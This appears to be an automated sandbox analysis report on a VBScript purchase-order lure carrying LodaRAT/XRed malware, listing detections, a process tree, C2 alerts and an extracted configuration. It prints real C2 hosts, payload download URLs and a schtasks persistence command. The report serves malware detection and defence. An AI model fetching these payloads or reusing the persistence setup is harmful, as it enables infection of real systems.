Windows Analysis Report
Open Purchase Order Summary Sheet.vbs

Overview

General Information

Sample name: Open Purchase Order Summary Sheet.vbs
Analysis ID: 1582355
MD5: 2bf2f38caab1fe7c657d29984c228b71
SHA1: 7a469f97c2e5d0dc1b786d89fc90c11a413275a5
SHA256: 44d5e912b8ef69914ba4ba6064dcded455f65e53ae2cfe4addee0f597b51e2c1
Tags: knkbkk212vbsuser-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • wscript.exe (PID: 7732 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Google.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe" MD5: A6BD561711EA8C2064C20644CCEEE074)
      • ._cache_Google.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
        • cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7220 cmdline: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
        • wscript.exe (PID: 8176 cmdline: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs MD5: FF00E0480075B095948000BDC66E81F0)
      • Synaptics.exe (PID: 8060 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
        • WerFault.exe (PID: 4788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 8016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3360 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 8156 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • TCPKPY.exe (PID: 1152 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Synaptics.exe (PID: 4152 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TCPKPY.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 4508 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Synaptics.exe (PID: 7732 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
    • WerFault.exe (PID: 2756 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 9672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7224 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • TCPKPY.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • Google.exe (PID: 8112 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe" MD5: A6BD561711EA8C2064C20644CCEEE074)
    • ._cache_Google.exe (PID: 5092 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 7920 cmdline: "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • ._cache_Google.exe (PID: 3976 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe" MD5: 3BF7444911198B54B1E8AB53F236683E)
  • TCPKPY.exe (PID: 6200 cmdline: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe MD5: 3BF7444911198B54B1E8AB53F236683E)
Name | Description | Attribution | Blogpost URLs | Link
Loda, LodaRAT | Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\UAINOJ.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
C:\Users\user\Documents\LSBIHQFDVT\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\LSBIHQFDVT\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\RCX4FAD.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCX4FAD.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.2732607207.0000000004372000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
0000000B.00000002.2718201933.0000000002A70000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000003.1491991054.000001C7E4325000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |

Source | Rule | Description | Author | Strings
3.0.Google.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
3.0.Google.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, Initiated: true, ProcessId: 7960, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49720
Source: Network Connection; Author: frack113, Florian Roth; Data: DestinationIp: 23.109.93.100, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, ParentProcessId: 7960, ParentProcessName: ._cache_Google.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 8176, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, ParentProcessId: 7960, ParentProcessName: ._cache_Google.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ProcessId: 8176, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4668, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", ProcessId: 7732, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, ProcessId: 7912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: Network Connection; Author: frack113; Data: DestinationIp: 23.109.93.100, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8104, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1, ProcessId: 7220, ProcessName: schtasks.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4668, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs", ProcessId: 7732, ProcessName: wscript.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 8060, TargetFilename: C:\Users\user\AppData\Local\Temp\1QGQHkIB.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:48:55.785865+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:55.786424+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49714 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:57.211247+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49722 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:57.221241+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49721 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:58.236748+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49729 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:58.261093+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49730 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:59.261008+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49734 | 142.250.185.78 | 443 | TCP
2024-12-30T11:48:59.263918+0100 | 2044887 | 1 | A Network Trojan was detected | 192.168.2.8 | 49735 | 142.250.185.78 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:49:58.562265+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.8 | 49879 | TCP
2024-12-30T11:50:36.168810+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.8 | 49879 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:48:56.102426+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49718 | 69.42.215.252 | 80 | TCP
2024-12-30T11:49:15.387383+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49755 | 69.42.215.252 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:48:31.198826+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49879 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49796 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49720 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:31.198826+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49837 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:48:55.800485+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49720 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:04.845921+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49747 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:13.865993+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49753 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:22.892519+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49796 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:31.988356+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49837 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:49:41.048759+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49879 | 172.111.138.100 | 5552 | TCP

AV Detection

Source: http://xred.site50.net/syn/SSLLibrary.dl; Avira URL Cloud: Label: malware
Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1; Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1; Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe; Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe; Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\ProgramData\Synaptics\Synaptics.exe; Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs; Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe; Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe; Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe; Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\ProgramData\Synaptics\RCX4FAD.tmp; Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX4FAD.tmp; Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1; Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1; Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe; Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe; Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe; Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe; Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe; Avira: detection malicious, Label: HEUR/AGEN.1353217
Source: 3.0.Google.exe.400000.0.unpack; Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCX4FAD.tmp; ReversingLabs: Detection: 91%
Source: C:\ProgramData\Synaptics\Synaptics.exe; ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe; ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe; ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe; ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe; ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe; ReversingLabs: Detection: 60%
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1; ReversingLabs: Detection: 91%
Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1; ReversingLabs: Detection: 91%
Source: Open Purchase Order Summary Sheet.vbs; Virustotal: Detection: 38%
Source: Open Purchase Order Summary Sheet.vbs; ReversingLabs: Detection: 26%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.0% probability
Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1; Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe; Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX4FAD.tmp; Joe Sandbox ML: detected
Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49867 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49869 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49878 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49877 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49885 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49886 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49892 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49899 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49900 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49905 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49906 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49911 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.8:49914 version: TLS 1.2
                            Source: wscript.exe, 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: wscript.exe, 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                            Source: wscript.exe, 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                            Source: wscript.exe, 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
